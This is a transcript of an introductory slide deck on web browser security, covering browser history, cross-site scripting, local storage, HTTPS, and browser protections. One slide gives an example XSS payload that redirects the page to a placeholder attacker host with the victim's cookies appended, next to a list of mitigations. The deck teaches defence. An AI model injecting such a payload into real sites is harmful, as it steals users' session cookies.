Presentation is loading. Please wait.

Presentation is loading. Please wait.

WEB BROWSER SECURITY By Robert Sellers Brian Bauer.

Similar presentations


Presentation on theme: "WEB BROWSER SECURITY By Robert Sellers Brian Bauer."— Presentation transcript:

1 WEB BROWSER SECURITY By Robert Sellers Brian Bauer

2 INTRODUCTION Relevance  Use Internet daily  Transmit personal information, needs to be secure Content 1.History 2.Security Issues and Mitigation 3.Protection

3 HISTORY First ever browser – WorldWideWeb (1990) o Created at CERN by Tim Berners-Lee o Used internally, no real security threats o Would only display HTML text o Allowed downloading of other file types

4 HISTORY Mosaic (1993) o First browser with a GUI o Lead to increase in Internet popularity Netscape Navigator (1994) o Nearly disappeared by 2000 Internet Explorer (1995) o Held as much as 95% of the market

5 HISTORY Safari (2003) o Apple’s browser Firefox (2004) o Open source Chrome (2008) o Rapid increase in market share

6 SECURITY ISSUES Increase in security issues o Complexity of web sites and browsers o Size of the Internet o Anyone can access Uses of Internet o Online banking o Shopping o More sharing of sensitive data

7 SECURITY ISSUES Cross Site Scripting (XSS) o Takes advantage of complex, dynamic web pages o Injects client side scripts, HTML o Can lead to cookie theft, browser redirection, untrusted content o Nearly 80% of vulnerabilities in 2007 (Symantec)

8 SECURITY ISSUES Example username= document.location='http://attackerhost.example/cgi-bin/ cookiesteal.cgi?'+document.cookie source: XSS Mitigation  Disable scripting  Sanitize input, escape HTML/scripts  No script access to cookies

9 SECURITY ISSUES Local Storage o Form data o Login credentials Encryption - HTTP vs HTTPS o Packet sniffing -> session hijacking, password stealing

10 PROTECTING YOURSELF ONLINE Incognito Mode (Google Chrome)  Allows user to switch between multiple privacy settings with the click of a button  Can be activated in one window/tab but not others Browser Guards o Modern browsers will prevent users from visiting malicious sites o Two main methods  List of reported malicious sites  Algorithm to detect malicious code on a site o This can protect from viruses, phishing, and other threats

11 CONCLUSION Browsers can only do so much Much security is responsibility of web designers Internet users should be aware of issues


Download ppt "WEB BROWSER SECURITY By Robert Sellers Brian Bauer."

Similar presentations


Ads by Google